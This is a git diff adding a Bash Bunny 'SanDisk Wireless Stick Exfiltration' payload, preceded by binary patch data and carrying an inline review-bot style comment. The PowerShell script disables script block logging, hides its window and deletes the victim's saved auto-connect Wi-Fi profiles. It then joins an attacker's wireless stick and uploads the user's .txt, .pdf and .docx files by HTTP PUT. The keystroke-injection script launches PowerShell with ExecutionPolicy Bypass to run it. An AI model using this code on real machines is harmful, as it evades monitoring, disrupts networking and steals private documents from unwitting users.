zYUr(&F;G|jOkB@bX<|6nzu3BnY&LrOr+~E23kaB$Vpv&O6Oxib4i5v%9`!0fJ+qqc z8Kdh=uPqm8Bam1HPK4kP;fBAeuzLa~yE3rFuD~6@Jf`tj^4VBY1Tdd}n`N7R5zzk0 zQtlt&sz0!!f5*~+N_#If>#4jcP{+d46Be<^SW65;U=;8@ZT`DjtgfynbS<8Leoz35 z9pGC;hT!k-hpXOVC|PAsLB!3>nKd5nk*#l!til9Ou{L&5OB^T=RJm`J z*)d(d8D?mB*oy+D2L7RhfDEB5BYd5RlC4c{l{^$)0eA4h=GWBHhJbC+kEIP}_blb1 zUBUM7KM{4rn){W*D4O7Fm>Bw&wnI%VdW*vwE({xdrxan1FzaOT`@^iw@F%9vjyEOL zL3&_cOxkIBlAY^5FBGyDN?6z0b+9;?4zi4_I5~TObbXVfg4c>L_=sdcW#dYMOQEX( zOT2tBWybUfnFP6-irHCJ3^Nb-9kVn<2E=pfYl7w{+kSc|Xvi2D`~w*XhljW>Gh`eH z6b9w#HZ6i{Bpw|H>CXC%;LnM@h|M-rYeAA^; zag~wJ%WEJ^tsft-6VI^H(2xPWfH{eE*39*F(%pl~FqJ9fMm87LWyd*(F=#T7$q)k^ znMb7I{h)zWNrslp|Af2V@*XSAf6njpf1n3)mjC;oRs9YLfq9A4VhY`J%zwPgLilJx zf@@en^N(*Z-23lb&AlikXp3662vP*>yA^A^)(B@SxBmg}&<^;dA#-PCp68Kp<9{KT+Fnmc4 z>3m<1p=&yoB~qa917l+cI7$M;lknSD1Yr*EOFI_O2r`ff zSmgiOGXQdeC!r^YCV8IuV8h`DhSR4j%UmYs5m9xpXiAtAo~THrL&S^C z3iSM}X?yX#>@P4QAZSd;p#vkFq-t2$Z|$|8JN&Xjx+J!Ny&SRnds@ZEhtSQ< zER5>b{RdZ`Jjym*#__oJUfFq7Qxm@aR*rO9>w`(}AWvxMkhWO>mC<{8Rn-HIFq-ke zz*B$zFnwRz`o2VgjM_YWm_j@A?oK{D6~S*(b3YVx%z(pklB?1QFJBVIUB}P7#Y+)) z{es{-5$xl93yem}x(R=k&ldCj`^75e+4z8&FJ8PD)+|cEnenv)trJ~Ib!%p}E+jTK z`B&|ZbzYu8l2h+j!>Fw#^9go=KTq4e69rbL#s&sL3i)Y@f08XMxg$*?GU`P*bkgam zR<;5?ep^B4Xf*x#?KLg6Z)OD!kB$;jwnesAjtpy#(w&cEzI;(i(>w`n77eRcAX;2} zYT>fRJgwzL+m?Rcm0@+dy<7cO78#7r7Yy2cOIw$67}+kN{q2SQ{S@xgYGo8{ShFb# zW0(ylQ%479qrlnl@$oTrl49->@%23A=fA3|txd&-o>~1to&{TZ8n)6Uf;-`n2$qX% zT5EV#9G zSQQo07H=AAKB{Rgl{}^Yn-{er6M56Mjf^JODP$8ZVL2k{=~s>}y%{+NtGjCu81eDZ zh~>vPzYw|h-O8P8g|RbIYLR{!~YWWoQ2GNzUE?j3iy`Ml?c&`{%ay6ZV~G|_ZXeq(&a<{hd;Kw#@-_s%cvHY= zlPb(5r=o&_Kbe$4cpD<B(5}_FX^QWZYd)9)I5=%_S1xDxR4~o5=f8&_LT$&y(sX02bUcJ@~vtZs` zQ+1DSQ|lM2r?NWNnpVX&C_G(%Ya9nFEs?@D#BXkr7vI~!Y;Hk?p<P1$N2nPd$4eTWag215JpgXe5_jEy7U*5Nw$e&fNq zHn)#I|KXLAqJ&36;d4*0SUhp@Lve?>I`qa($mfNX&vCowBpo|hB{$44($K%|!Ar06 z^BJHj+~(rqvT|7)4r}%8N*Q{VCQYQjbb513X03(hIe{3O?ctqXB#7 zBA@6}My*gw1>8m@r>N^0Svlcq|1*LATOn5;4P_d|wXKiM7}W|HO&OUYiJfVNoY;ys zX>ythOQoT#zL3QX+RA;Xm`K9>r 
zW>V`8tqmF)B7$QyPT%T+T4W_YvT_MbN+#3SddG!&K-K)@IA000s~Gn@-ec?Nmujl5 zNKsK3Ks|o4R4fj@Fg+0cMp|)y)Z^6L%y6AeKiatgY8wjO1`n_s(G1t-^UmA+4W;x2jnZqbZ{X+Dd4B3l7ekxpLemA zd5F4>c1Sj-x`P24CZ05Ph#T!;u5)1PM@DJNgE1gD`auIz5=k58Dej(8&P|-T-HFSd z-9SJhA|9+WH(yPoZH84V0&zf3#+uxOo8T;EHRp=ifa|p_>83uMr>qovz>M$QCAs_3 zzAEz4fhrW2$Mbu2FZcYrom6gc-=~j0&{(j1>aF7%ji(p%^z;Z04#%!cUE36X;-?3| zE!?Q6nhk_AeN=58?OBuVlh#%sE<7iX*oB6MnrscTAsgwy$=0ejH7!j&aW~|Ntn)pS z6^}F=Rw#>m)S*HbhEjYWWdK5hCOfd?ksc2;7sTaq*MU(%x7`k(%u9>1(+^ClE(7#p z0*>&M{*p%0zhCMC@-NE#r&#Za{c@LWWFzn=HUdFJ>;TP3-*pkt6BCrg?tM9?V$b}W z9Jl8H{$kITJ2^Q>d$m`2q76beX&%gEklnL>A0lDXo(ANlq?}yePSFolA*0;TC@J(3;t6DXKLwTw~*J5w{7({VdRVu@NS_&4%O;|O?;pD+B zLQi7U%{N+Ji1w6xXm%;Tt84+^-&^rT#%j+7Qvo2Et>J`#i*P`jre8W2J!`U15s?Hvz?-1 zjIH&q7W!CF;t{k&4TY97g767c^VN%UDlCk92u{KHstMT0o#NsaGX#)<#~brIF1Kh& zFYuil`TFdFFUcyHSP9t}a3p+)DcI9>%K*h-msW{b+V8l>g5=Etq8Z3x^=1V21O&uR zZf;w+!M?*C)a2xcFU$}~-WVE7h`p20+RFfL9c-H<2aDa{+pdpIf9`xW{<+csTMxdR z36O#Q&2VS68k~0mioD=~!U@`e3Lrz5^!N20QOR!aIt-)y=9`&1DQ=o~oPUYAwwDL! zVJe-iSt1oEFklXSRtUx05kzz^j}~z5T*_{**H2l)_e+GVGeut4)21}nj$Dg5cBoJn zLMd!~6ts^O;uTPqj`Q179t}hiD<#Enkc5!UZIJcx6)b~Qqr2$zKgB&w&#-8=3S0kc z;ov+HWzQ(l2G<4$D9cl_iaU3-VXa+d1H*kemgsCSPG*QUp zaf~Y+585H6U9ItbXmMI2u%Mgq@a7LRT4k<}Ll*7{tDS2th>mUZyquNQs%MiR-P=;? z(qvTVIwIP4RUtURO83#kOiL&ikE2JCDcw1^FBj A(f|Me literal 0 HcmV?d00001 diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 new file mode 100644 index 00000000..e08fcf19 --- /dev/null +++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 
@@ -0,0 +1,159 @@
+#
+# Author: TW-D
+# Version: 1.0
+#
+
+param (
+ [string] $SSID,
+ [string] $PSK,
+ [string] $LOOT,
+ [string] $DIRECTORY,
+ [string] $EXTENSION
+)
+
+# Avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
+
+ # Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+ #
+ $interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
+ If ($interface_guid) {
+ $wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
+ $wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
+ $wlan_service_items | ForEach-Object {
+ [xml] $xml_content = Get-Content -Path $_.FullName
+ $mode = $xml_content.WLANProfile.connectionMode
+ $name = $xml_content.WLANProfile.name
+ If ($mode -eq "auto") {
+ (NETSH WLAN DELETE PROFILE name="$name") | Out-Null
+ }
+ }
+ }
+
+ # Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+ # + $profile_guid = "{" + [guid]::NewGuid().ToString() + "}" + $profile_path = "${env:TEMP}\${profile_guid}.xml" + $ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) }) +@" + + + ${SSID} + + + ${ssid_hex} + ${SSID} + + + ESS + auto + + + + WPA2PSK + AES + false + + + passPhrase + false + ${PSK} + + + + + false + + +"@ | Out-File -FilePath "${profile_path}" + + (NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null + Remove-Item -Path "${profile_path}" -Force + + # Checks whether the Wi-Fi interface is connected to the "SanDisk". + # Whether the gateway can be reached. + # If not, automatically starts again. + # + While ($TRUE) { + $ConnectionError = $NULL + Try { + (NETSH WLAN CONNECT name="$SSID") | Out-Null + $wifi_connected = (Get-NetConnectionProfile).Name + $gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop) + $gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet) + If ($wifi_connected -eq $SSID -And $gateway_reachable) { + Break + } + } Catch { + $ConnectionError = $_ + Start-Sleep -Seconds 8 + } + } + + # + # Exfiltration of the files via the HTTP channel. 
+ #
+
+ Function Invoke-CustomRequest($Url, $Method) {
+ $RequestError = $NULL
+ Try {
+ $request = [System.Net.WebRequest]::Create($Url)
+ $request.Method = $Method
+ $request.GetResponse().Close()
+ } Catch {
+ $RequestError = $_
+ return $FALSE
+ }
+ return $TRUE
+ }
+
+ Function Invoke-UploadRequest($Url, $File) {
+ $RestError = $NULL
+ Try {
+ $empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
+ If (!$empty) {
+ Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
+ }
+ } Catch {
+ $RestError = $_
+ }
+ }
+
+ Function Exfiltration-Files($Directory, $Extension, $Url) {
+ $files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
+ ForEach ($file in $files) {
+ $random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
+ $basename = Split-Path -Path "${file}" -Leaf -Resolve
+ Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
+ }
+ }
+
+ $sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
+
+ $check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
+ If ($check_loot) {
+ Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+ } Else {
+ Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
+ Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+ }
+
+ # Cleanup
+ #
+ (NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
+ Exit
+
+}
\ No newline at end of file
diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt
new file mode 100644
index 00000000..e643033f
--- /dev/null
+++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt
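Review bot: `$RequestError`, `$RestError` and `$ConnectionError` are assigned in the three Catch blocks (Invoke-CustomRequest, Invoke-UploadRequest and the While loop earlier in the hunk) but never read afterwards, so they are dead assignments that make each Catch look like it handles the error when it only discards it; drop the `$... = $NULL` / `$... = $_` lines or actually use the value. `Invoke-UploadRequest` has no return statement, so the `| Out-Null` on its call inside Exfiltration-Files is a no-op and can go. `Exfiltration-Files` also breaks the Verb-Noun convention the other two functions follow (`Get-Verb` lists no `Exfiltration` verb), so a name in that form would keep the file consistent. The profile here-string in the middle of the hunk has lost its XML tags in this rendering, so that part could not be checked.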
@@ -0,0 +1,74 @@
+#!/bin/bash
+#
+# Title: SanDisk Wireless Stick Exfiltration
+#
+# Description: Files Exfiltration with "SanDisk Wireless Stick"
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Exfiltration
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 5000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
+Q ENTER
+Q DELAY 1500
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file